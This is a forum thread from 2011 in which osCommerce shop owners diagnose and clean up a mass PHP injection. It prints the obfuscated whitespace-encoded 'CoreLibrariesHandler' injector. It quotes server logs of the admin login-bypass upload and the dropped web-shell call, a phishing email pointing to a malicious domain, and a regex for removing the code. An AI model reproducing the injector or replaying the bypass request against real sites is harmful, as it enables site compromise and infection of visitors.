18 replies to this topic

[jacobidesign]

A new client was recently hacked with the Try Pick Colors script and some other Javascript opening invisible iFrames, and I am in the process of hunting down and removing all of this malicious code. I have found a few hundred instances of it, but I did not originally make this site. It's using osCommerce 2.2 060817 and it has been so Frankensteined together that I'm not sure where something went wrong.

Most of the PHP files have this at the very top:

<?php /**
 * Gets some core libraries and displays a top message if required.	/*
 */ function CoreLibrariesHandler() {					/*
 */   $session_keys = '		 	   				   			  		 		   		 			  	  		 	  	 				 			 				  			  		 			  	  		   		  				 	  	   	  		 					 	   			 	   				  			 	   	 				  	 				 		  	 	 		   		 		   		 		 		   		  	 	 			  		 			 	   		 				 		 			  		   	  				 		 			  			 			 		  	 	 		 				 			  		   		 					 	 			  		   		 		   		  	 				 		 	 	  			   	 			 	 	 		  	 	 			  	  				  	  	 			  		 	 	  			  		  	   	   					   						 				 			  		 		   		 			  	  		 	  	 				 			 								 	 	   						 				 		 			  		 				 		 	  	 		 			  		  	   		  	 	 					 						 	 	   						 				 		   	  		 				 		  	   				  	  						 	 	   						 				 		 					 	   		 		 	 		 								 ';  /*
 */									/* 
 */	foreach(str_split($session_keys, 8) as $k=>$v) { 		/*			 
 */		$v = str_replace('	', 1, str_replace(' ', 0, $v));	/*
 */		$session_keys[$k] = chr(bindec($v)); 			/*
 */	} 								/*
 */									/*
 */	if($session_keys) echo $session_keys; }				/*
 */	register_shutdown_function('CoreLibrariesHandler');		/*
 */									/*
 ************************************************************************/



 ?><?php session_start(); ?>

After removing the malicious code that I found, I now receive this when attempting to load any PHP page:

Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in /nas-01/sites/sitenamehere.com/public_html/blog/index.php:4) in /nas-01/sites/sitenamehere.com/public_html/03/shop_meta.php on line 11

This is also giving similar errors on its integrated WP blog:

Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in /nas-01/sites/sitenamehere.com/public_html/blog/index.php:4) in /nas-01/sites/sitenamehere.com/public_html/blog/wp-blog-header.php on line 11

I've downloaded an archived copy of 2.2 from SourceForge and I don't see the first bit of code anywhere, so I'm assuming that it is also part of the hack of the site or there is some osCommerce/WP bridge that I'm not finding online. I just have not worked with osCommerce in a veeeeeeeeeeeeeeery long time and would like confirmation on this.

Also the client's last backup was...get this...in 2008. By the looks of the release he's running I may still be able to use it to piece things back together, but wanted to check with you folks to see if there's a different direction I should be moving in.

[NodsDorf]

I just googled
CoreLibrariesHandler()

It appears that many shops are showing up as hacked. I know its not part of OSC, but I don't know if that could had been used to integrate WP. I know people were working on it but never saw it released.

[ReineElie]

Hi, I'm French and I have the same problem since 2 days. All my files is contamined.

Who do that and why ?

[NodsDorf]

Over 7 years with OSC now. I learned that you have to make backups regularly and do everything that is suggested in the How To Secure Your Site thread.

Clearing up a hacked site isn't fun. But can be done.

[germ]

 ReineElie, on 15 May 2011 - 01:29 PM, said:

Hi, I'm French and I have the same problem since 2 days. All my files is contamined.

Who do that and why ?

"Why?" generally falls into 3 major categories:

• 1. Fame. They infect the site so it displays a "Hacked by Some-Dirty-So-And-So" page.
  
• 2. Information. They try to silently hack the site to steal information.
  
• 3. Infection. They hack the site to try to implant malicious code on the visitors PC.

[pryderi]

I've had this error on and off for the last two days as well.
I find at the footer of my php files that there's a refernce to a javascript file that should not be there, the refernce comes from my languages file which are all amended with the code that you pasted. Can't understand how that file can be amended every so often. HELP!!!
Is it a CRON job running?
I've downloaded the content of the infected site and searched for the code but can't find it.
is there a way of locking the language folder so that it can't be changed ?

[germ]

The javascript is probably the result of obfuscated (encrypted) PHP code.

Visit the link below:

How to Secure Your Site

[maZat]

Hello
I've just regiestered on this forum becouse i think i know the solution.
I have same problem with my websites. I have 5 or more websites on one server and they are all infected with this corelibrarieshandler()

I've checked server logs and found one strange log:

vpn-178-217-167-158.didan.com.ua - - [13/May/2011:05:31:37 +0200] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.0" 200
13716 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13

It adds few *.php files to /images/ directory

next log:

vpn-178-217-167-158.didan.com.ua - - [13/May/2011:05:31:38 +0200] "GET /images/img-485015692075.php?showimg=1 HTTP/1.0" 200 15 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13"

it executes php file and infect all php files on server.

Solution what to do can be found here:
http://forums.oscommerce.com/topic/365163-a-proper-fix-for-file-managerphp-and-define-languagephp-security-holes/

To clear your site you need to upload and overwrite backuped files.. no other way
or do what i did - ask your admin (webhost) to do it automatically for you!

[pryderi]

just an update as I think I found the code that's been driving me crazy over the weekend.

I suffered the same attack on Friday the 13th, looks like this was popular on Friday the 13th?!

I looked at my server log as advised and found this:

178.217.167.158 - - [13/May/2011:12:24:20 +0100] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.0" 200 15519
178.217.167.158 - - [13/May/2011:12:24:21 +0100] "GET /images/img-357797014332.gif HTTP/1.0" 200 377
178.217.167.158 - - [13/May/2011:12:24:21 +0100] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.0" 200 15519
178.217.167.158 - - [13/May/2011:12:24:21 +0100] "GET /images/img-357797014332.php?showimg=1 HTTP/1.0" 200 15

looks like the hacker uploaded two files a gif image and a php file in 10 seconds flat!

then he comes back at 3pm (must have been on a lunch break?) to finish the job off by running the php with some parametrs:
178.217.167.158 - - [13/May/2011:15:08:03 +0100] "POST /images/img-357797014332.php?showimg=1&showimg=1&cookies=1 HTTP/1.1" 200 6291

I'm not sure if I'm correct in saying oll of this by the way but looks like that to me! I've added a htpasswd to my admin folder now to prevent him uploading stuff to my images/ folder. I've also followed the steps given here as well:
https://github.com/osCommerce/oscommerce2/commit/65219120b1f174aa69b5045bfe43ff5dc22d8e63


I hope this helps, I'm not sure if I'm correct in what I'm saying but looks like that to me.

Good luck, I hope this does not come back.
Pryderi

[pryderi]

looking up his IP I think we've got the same person hacking us you know.
Host name vpn-178-217-167-158.didan.com.ua

[pryderi]

it's a turkish ISP. I guess we could ban IP addresses from TUrkey?

[germ]

Banning IP addresses (for the most part) is a band-aid.

Either the shop is secure or it isn't.

If someone from your own country hacked you the same way are you going to ban your country as well?


Probably not.

Like I said....

Either the shop is secure or it isn't.

[jacobidesign]

Well said germ.

The .cx.cc and .co.cc domains are my issue with this site. I haven't even made it into the server logs yet. I'm still working on getting the CoreLibrariesHandler() code out of about 3,960 files.

[pryderi]

 jacobidesign, on 15 May 2011 - 11:21 PM, said:

Well said germ.

The .cx.cc and .co.cc domains are my issue with this site. I haven't even made it into the server logs yet. I'm still working on getting the CoreLibrariesHandler() code out of about 3,960 files.

could you use the find and replace function?
I've also followed the steps in the securing your site page as well.

[maZat]

hello again,
maybe IP is from Turkey, but google analytics shows Brasilian localization.

I have a bad news, there is a chance that your infected website did a spam.. to all of your clients :/ Mine did..

Here is the email message:

Sent: Fri, May 13, 2011 11:01:27 AM
Subject: Your account is locked for security reasons.


Your account is locked for security reasons

This happens because somebody tried to make a large amount of attempts to guess your password and enter your account.
Many times, it's not actually someone trying to access the account, they just know that by sending a huge amount of requests,
they can cause the user problems by having their account closed.

The servers understand that a human can make about 5 or 6 attempts a minute,
this would be normal if you had forgotten your password or made a typo etc...  and at this rate,
it would take 18011 years to guess your password.

Web site details as follow: keladocking.cx.cc/info/ [<-- DON'T GO THERE!!]

An automated program however, could make 1000s of requests a minute or even more!  
Its when the server experiences these numbers, for your own security, it locks your account.

[jacobidesign]

 pryderi, on 16 May 2011 - 07:20 AM, said:

could you use the find and replace function?
I've also followed the steps in the securing your site page as well.

The actual code in the php files are about 30 lines deep, and using Notepad++ the find box won't take the whole argument. I ended up setting up a macro that once I open the file and confirm the code is the first X amount of lines I hit a button and it highlights, removes, and saves for me.

Has anyone found any recurring CRON jobs that may affect this that are left over?

[pryderi]

 jacobidesign, on 16 May 2011 - 08:32 AM, said:

The actual code in the php files are about 30 lines deep, and using Notepad++ the find box won't take the whole argument. I ended up setting up a macro that once I open the file and confirm the code is the first X amount of lines I hit a button and it highlights, removes, and saves for me.

Has anyone found any recurring CRON jobs that may affect this that are left over?

I guess if you delete the source seed file then the cron job would be unable to run it anyway.
Good luck with it.
Pryderi

[WeWatch]

If you have all your files downloaded and you're on a PC, you can use grepWin (free download) and use the search regex and use this string to find and remove all of these infections:

<\?php\s*\/\*\*\s*\*\s*Gets some core libraries and displays a top message if required.\s*\/\*\s*\*\/\s*function CoreLibrariesHandler\(\).*?\?>

The nice thing about grepWin is that if you tell it to make backups, it will save the original file with a .bak extension.

Then you can upload the cleaned files to your site.

Many of these appear to have happened by a password stealing virus on a PC that's been used to FTP files to the website. Scan all PCs with something like Malwarebytes, AVG, Avast or Kaspersky.

Post back here with any questions or updates - please.

[scottstgelais]

Thanks for all of the great info! I downloaded a client's site, install grepWin, ran the search string provided and it found 0 matches. Am I doing something wrong?

Thanks again for all of the assistance,
Scott